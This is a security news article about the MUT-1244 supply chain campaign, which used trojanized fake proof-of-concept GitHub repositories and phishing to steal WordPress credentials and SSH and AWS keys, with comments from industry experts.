More than 390,000 credentials to WordPress sites were compromised in a year-long supply chain attack that leveraged a phishing campaign that targeted thousands of academic researchers and a large number of trojanized GitHub repos, mainly fake proof-of-concept (POC) exploits.
Datadog Security Labs said in a Dec. 13 post that these methods were designed to deliver a sophisticated second-stage payload capable of dropping cryptocurrency miners and stealing system information.
Dubbed MUT-1224, short for “mysterious unattributed threat” — the attack only represented a small percentage of the more than 800 million WordPress sites, but was noteworthy because it targeted security pros such as pentesters and threat researchers, as well as threat actors who acquired the credentials illegally.
The Datadog researchers said hundreds of MUT-1244 victims were and still are being compromised, pointing out that sensitive data such as SSH private keys and Amazon Web Services (AWS) access keys were exfiltrated.
Jason Soroko, senior fellow at Sectigo, explained that the attackers set up dozens of GitHub repositories with fake PoC exploits. Victims who were security pros, red teamers and threat actors, then unknowingly installed malicious second-stage payloads that stole credentials and keys. Simultaneously, a phishing campaign tricked targets into installing a fake kernel update.
“These trojanized repos looked legitimate, often appearing in trusted threat intelligence feeds,” said Soroko. “By downloading and running this code, victims essentially infected themselves. This supply chain attack compromised the normal software acquisition process. Instead of attacking targets directly, the attackers poisoned the sources victims relied on to obtain tools and exploits.”
Itzik Alvas, co-founder and CEO of Entro Security, added that the MUT-1244 attackers successfully compromised the supply chains of various enterprises' code by creating repositories of code with legitimate-sounding names and functional uses that were then inherited as dependencies by many developers.
“These code dependencies came bundled with a trojanized password checker that recorded passwords as they were input by users into websites that inherit these dependencies,” explained Alvas. “Because this attack leverages dependencies in the supply chain the campaign has gone undetected for a year, compromising an estimated 390,000 credentials.”
Stephen Kowski, Field CTO at SlashNext Email Security, said this attack targeted the software development pipeline by corrupting widely-used libraries and tools. Kowski said the malicious code could spread to numerous downstream applications and systems once installed.
“This campaign highlights why teams must examine all code, even from trusted sources,” said Kowski. “Advanced threat detection tools that spot malicious code patterns and suspicious behaviors in real-time help reduce these risks. Organizations benefit from automated security scanning solutions that analyze dependencies and identify potential threats before they spread through the software supply chain.”
